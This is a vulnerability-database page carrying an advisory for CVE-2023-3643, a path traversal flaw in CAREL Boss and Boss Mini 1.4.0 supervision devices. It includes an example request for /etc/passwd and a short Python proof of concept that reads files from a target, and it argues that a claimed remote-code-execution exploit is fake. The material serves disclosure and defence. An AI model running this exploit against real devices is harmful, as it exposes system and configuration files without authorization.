Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 CAREL Boss / Boss Mini 1.4.0 Path Traversal

🗓️ 26 Nov 2025 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 134 Views

Carel Boss and Boss Mini 1.4.0 suffer LFI allowing remote data disclosure; no RCE.

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Boss Mini 1.4.0 - local file inclusion Exploit
4 Mar 202400:00
zdt
Circl		CVE-2023-3643
12 Jul 202322:25
circl
CNNVD		Carel Boss Mini 安全漏洞
12 Jul 202300:00
cnnvd
CVE		CVE-2023-3643
12 Jul 202317:31
cve
Cvelist		CVE-2023-3643 Boss Mini document file inclusion
12 Jul 202317:31
cvelist
Exploit DB		Boss Mini 1.4.0 - local file inclusion
3 Mar 202400:00
exploitdb
Exploit DB		Boss Mini v1.4.0 - Local File Inclusion (LFI)
3 Mar 202600:00
exploitdb
EUVD		EUVD-2023-44287
12 Jul 202317:31
euvd
ICS		CAREL Boss-Mini
20 Jun 202406:00
ics
Nuclei		CAREL Boss Mini <= 1.4.0 - Local File Inclusion
3 Jun 202606:04
nuclei
Rows per page
=============================================================================================================================================
    | # Title     : Boss Mini 1.4.0 path traversal                                                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.carel.com/product/boss                                                                                          |
    =============================================================================================================================================
    
    [+] Summary : 
    
    A vulnerability has been identified in CAREL Boss and Boss Mini
    supervision devices running version 1.4.0.The weakness allows
    remote unauthenticated users to disclose sensitive information
    through a Local File Inclusion (LFI) vector due to improper input
    validation.
    
    Importantly, this vulnerability does NOT provide any form of RCE.
    
    [+] References
    
    Based on the public advisory published on Packet Storm  
    
    (https://packetstorm.news/files/id/177394/)  
    
    and the official CVE entry for **CVE-2023-3643**
    
    combined with a fulltechnical analysis of the exploitation flow, it has been conclusively
    confirmed that the widely circulated "Boss Mini 1.4.0 LFI 
    Log Poisoning" exploit is **fake, impossible, and non-functional**.
    
    The device does not run PHP, does not support log-based code execution,
    and the vulnerable endpoint does not allow any code interpretation.  
    Therefore, any exploit claiming **LFI → Log Poisoning → RCE** is  
    **technically impossible and must be considered false**.
    
    --------------------------------------------------------------------
    
    3. Affected Products
    ---------------------
    - CAREL Boss Mini 1.4.0
    - CAREL Boss 1.4.0
    - Possibly earlier versions with similar structures
    
    --------------------------------------------------------------------
    
    4. Vulnerability Details
    -------------------------
    The vulnerable parameter **path** fails to sanitize directory traversal
    patterns, allowing attackers to read arbitrary files accessible by the
    web process.
    
    Example vulnerable pattern: /boss/document?path=../../../../etc/passwd
    
    This grants information disclosure but **cannot** escalate to RCE because
    the appliance lacks PHP or any script execution engine.
    
    --------------------------------------------------------------------
    
    5. Impact
    ----------
    This vulnerability allows:
    - Reading system files
    - Accessing sensitive configuration data
    - Disclosure of internal JSON configuration structures
    
    This vulnerability **does NOT allow**:
    - Command execution  
    - Reverse shell  
    - Payload injection  
    - Any form of RCE  
    
    --------------------------------------------------------------------
    
    6. (PoC)
    -------------------------------
    ```python
    #!/usr/bin/env python3
    # CVE-2023-3643 
    # Research: Indoushka 
    
    import requests
    
    target = "http://TARGET-IP"
    payload = "../../../../etc/passwd"
    
    url = f"{target}/boss/document?path={payload}"
    
    r = requests.get(url, timeout=10)
    
    if r.status_code == 200:
        print("[+] Vulnerable! File contents:")
        print(r.text)
    else:
        print("[-] Not vulnerable or patched.")
    	
    	
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Nov 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 3.17.3 - 9.8
CVSS 27.5
CVSS 37.3
EPSS0.35215
carel bosspath traversallocal file inclusionversion 1.4.0remote disclosureno code execution
134